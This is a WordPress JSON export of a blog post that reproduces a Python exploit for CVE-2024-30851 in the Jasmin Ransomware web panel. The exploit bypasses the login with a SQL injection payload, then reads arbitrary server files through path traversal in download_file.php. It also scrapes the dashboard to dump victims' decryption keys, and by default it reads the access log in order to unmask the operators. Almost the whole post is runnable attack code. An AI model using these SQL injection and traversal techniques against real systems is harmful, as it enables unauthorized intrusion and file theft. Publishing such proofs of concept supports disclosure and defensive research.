{"id":56113,"date":"2024-04-06T00:41:23","date_gmt":"2024-04-05T20:41:23","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177945\/jasminransomware11-fileread.txt"},"modified":"2024-04-06T00:41:23","modified_gmt":"2024-04-05T20:41:23","slug":"jasmin-ransomware-1-1-arbitrary-file-read","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/jasmin-ransomware-1-1-arbitrary-file-read\/","title":{"rendered":"Jasmin Ransomware 1.1 Arbitrary File Read"},"content":{"rendered":"<p># Exploit Title: Jasmin Ransomware arbitrary file read<br \/># Date: 2024-04-04<br \/># Exploit Author: @_chebuya<br \/># Software Link: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware<br \/># Version: v1.1<br \/># Tested on: Ubuntu 20.04 LTS<br \/># CVE: CVE-2024-30851<br \/># Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login<br \/># Github: https:\/\/github.com\/chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc\/tree\/main<br \/>import requests<br \/>import argparse<br \/>import os<br \/>from bs4 import BeautifulSoup<\/p>\n<p>def get_file(jasmin_url, filepath):<br \/>response = requests.get(<br \/>f'{jasmin_url}\/download_file.php?file={filepath}&#8217;,<br \/>allow_redirects=False<br \/>)<\/p>\n<p>return response.text<\/p>\n<p>def get_keys(jasmin_url):<br \/>headers = {<br \/>&#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded; charset=UTF-8&#8217;,<br \/>}<\/p>\n<p>data = &#8220;username=&amp;password=&#8217;+or+1%3D1+&#8211;+-&amp;service=login&#8221;<br \/>login_req = requests.post(f'{jasmin_url}\/checklogin.php&#8217;, headers=headers, data=data)<br \/>cookies = login_req.cookies<\/p>\n<p>list_req = requests.get(f'{jasmin_url}\/dashboard.php&#8217;, cookies=cookies)<br \/>soup = BeautifulSoup(list_req.text, &#8216;html.parser&#8217;)<\/p>\n<p>rows = soup.find_all(&#8216;tr&#8217;)<\/p>\n<p>print(f&#8221;Dumping decryption keys from {len(rows)-1} victims&#8221;)<br \/>for row in rows:<br \/>data = row.find_all(&#8216;td&#8217;)<br \/>if len(data) == 0:<br \/>continue<\/p>\n<p>username = data[1].get_text()<br \/>hostname = data[0].get_text()<br \/>filepath = data[7].find(&#8216;a&#8217;)[&#8216;href&#8217;].split(&#8220;=&#8221;)[1]\n<p>print(f&#8221;Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}&#8221;)<\/p>\n<p>parser = argparse.ArgumentParser(description=&#8221;LFD\/SQLi Exploit PoC for Jasmin Ransomware panel&#8221;)<br \/>subparser = parser.add_subparsers(dest=&#8217;subcommand&#8217;)<\/p>\n<p>file_parser = subparser.add_parser(&#8220;getfile&#8221;, help=&#8221;Read a file off the server&#8221;)<br \/>file_parser.add_argument(&#8220;-u&#8221;, &#8220;&#8211;url&#8221;, required=True, help=&#8221;The jasmin ransomware web panel url (http:\/\/target_server)&#8221;)<br \/>file_parser.add_argument(&#8220;-f&#8221;, &#8220;&#8211;file&#8221;, default=&#8221;c:\/xampp\/apache\/logs\/access.log&#8221;, help=&#8221;The file to read on the target server&#8221;) # Default is the access log, deanonymize the operators!<\/p>\n<p>keys_parser = subparser.add_parser(&#8220;getkeys&#8221;, help=&#8221;Get decryption keys of victims&#8221;)<br \/>keys_parser.add_argument(&#8220;-u&#8221;, &#8220;&#8211;url&#8221;, required=True, help=&#8221;The jasmin ransomware web panel url (http:\/\/target_server)&#8221;)<\/p>\n<p>args = parser.parse_args()<\/p>\n<p>if args.subcommand != None:<br \/>target_url = args.url.rstrip(&#8220;\/&#8221;)<\/p>\n<p>if args.subcommand == &#8220;getkeys&#8221;:<br \/>get_keys(target_url)<br \/>elif args.subcommand == &#8220;getfile&#8221;:<br \/>target_file = args.file.replace(&#8220;\\\\&#8221;, &#8220;\/&#8221;).replace(&#8220;c:&#8221;, &#8220;&#8221;)<br \/>target_path = os.path.join(&#8220;..\/..\/..\/..\/..\/..\/..\/..\/..\/&#8221;, target_file)<br \/>print(get_file(target_url, target_path))<br \/>else:<br \/>parser.print_help()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Jasmin Ransomware arbitrary file read# Date: 2024-04-04# Exploit Author: @_chebuya# Software Link: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware# Version: v1.1# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30851# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login# Github: https:\/\/github.com\/chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc\/tree\/mainimport requestsimport &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56113","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56113","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56113"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56113\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56113"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56113"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56113"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}